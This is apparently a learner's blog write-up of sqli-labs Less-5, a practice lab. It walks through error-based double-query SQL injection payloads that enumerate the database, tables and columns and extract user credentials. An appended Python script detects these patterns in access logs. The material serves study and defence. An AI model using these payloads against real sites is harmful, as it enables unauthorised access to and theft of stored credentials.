Example: Less-5 Double Query - Single Quotes - String
Key points:
The principle of error-based injection is to construct an always-true
Common error-based injection
(1)
The general structure is:
$a = the statement you want to execute
$b = floor(rand(0)*2)
select count(*), concat($a, $b)
Enter any id, e.g. id=1; the page changes, which shows that there is data interaction.
Enter ?id=1' and the page looks as follows, which shows that a SQL injection vulnerability exists and that the closing character is a single quote.
Use order by to find the number of columns.
Enter, one after the other:
?id=1' order by 3 --+
?id=1' order by 4 --+
So the actual number of columns is three.
Use union select to find the echoed (displayed) columns.
Enter:
?id=1' union select 1,2,3 --+
The page shows:
This shows that no column is echoed, so error-based injection can be tried.
Enter:
?id=-1' union select 1,count(*),concat((select database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+
This triggers a duplicate-entry error on the unique key, and the error message reveals the database name security.
What follows is the routine querying workflow.
Enter:
?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security'),floor(rand(0)*2)) as a from information_schema.tables where table_schema = 'security' group by a --+
The subquery returns more than one row, so the rows can only be displayed one at a time, using limit 0,1 and so on (why not group_concat? Because after entering it the page shows nothing, which means the character-length limit was exceeded).
So enter, in turn:
?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),floor(rand(0)*2)) as a from information_schema.tables where table_schema = 'security' group by a --+
?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 1,1),floor(rand(0)*2)) as a from information_schema.tables where table_schema = 'security' group by a --+
?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 2,1),floor(rand(0)*2)) as a from information_schema.tables where table_schema = 'security' group by a --+
?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 3,1),floor(rand(0)*2)) as a from information_schema.tables where table_schema = 'security' group by a --+
The table names obtained are emails, referers, uagents and users.
The users table is clearly more sensitive, so continue querying there. Enter, in turn:
?id=-1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name = 'users' limit 0,1),floor(rand(0)*2)) as a from information_schema.columns where table_name = 'users' group by a --+
Column names obtained: id, username, password
?id=-1' union select 1,count(*),concat((select username from users limit 0,1),floor(rand(0)*2)) as a from users group by a --+
?id=-1' union select 1,count(*),concat((select username from users limit 1,1),floor(rand(0)*2)) as a from users group by a --+
(and so on, incrementing the limit offset one row at a time)
Obtained: Dumb, Angelina, Dummy, secure, stupid, superman, batman, admin, admin1, admin2, admin3, dhakkan, admin4
That is a lot; let's just look up the password of admin:
?id=-1' union select 1,count(*),concat((select password from users where username ='admin'),floor(rand(0)*2)) as a from users group by a --+
Password obtained: adimin
Done! This part is actually quite hard; for now I can only type it out, and I still need to understand it properly in later study.
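As an added defender-side example (not part of the write-up), the following Python script scans web-server access-log lines for the double-query pattern used above (count(*), concat(), floor(rand(0)*2) and group by appearing together in one parameter) and for the preliminary order by / union select probes. The Combined-Log format and the sample lines are constructed assumptions, not logs from the original page.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# All four markers of the floor(rand(0)*2) + group by error-based technique
# must be present in one decoded parameter value to count as "error_based".
MARKERS = [
    re.compile(r"\bcount\s*\(\s*\*\s*\)", re.I),
    re.compile(r"\bconcat\s*\(", re.I),
    re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
    re.compile(r"\bgroup\s+by\b", re.I),
]
# Weaker signals (column counting / union probing) logged as "probe".
PROBES = [re.compile(r"\border\s+by\s+\d+", re.I),
          re.compile(r"\bunion\s+select\b", re.I)]

# Combined Log Format (assumed layout): ip - - [ts] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def classify_request(path):
    """Return 'error_based', 'probe' or None for one request path."""
    qs = parse_qs(urlparse(path).query, keep_blank_values=True)
    # parse_qs decodes once; unquote_plus again to catch double-encoded input.
    decoded = " ".join(unquote_plus(v) for vals in qs.values() for v in vals)
    if all(m.search(decoded) for m in MARKERS):
        return "error_based"
    if any(p.search(decoded) for p in PROBES):
        return "probe"
    return None


def scan_log(lines):
    """Return (ip, verdict, status) for every suspicious request in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        verdict = classify_request(m.group("path"))
        if verdict:
            hits.append((m.group("ip"), verdict, m.group("status")))
    return hits


# Constructed sample log lines (not taken from the write-up).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2025:10:00:02 +0000] "GET /Less-5/?id=1%27 HTTP/1.1" 200 480',
    '10.0.0.5 - - [01/Jan/2025:10:00:03 +0000] "GET /Less-5/?id=1%27%20order%20by%203%20--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2025:10:00:04 +0000] "GET /Less-5/?id=-1%27%20union%20select%201,count(*),concat((select%20database()),floor(rand(0)*2))%20as%20a%20from%20information_schema.tables%20group%20by%20a%20--+ HTTP/1.1" 200 530',
    '10.0.0.9 - - [01/Jan/2025:10:00:05 +0000] "GET /index.php?page=group_by_report HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The bare-quote request (id=1') is deliberately not flagged on its own; in practice it is best correlated with the 200-with-changed-body responses that the write-up relies on, or with database error strings in the application log.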
From: https://blog.csdn.net/weixin_60113601/article/details/145066918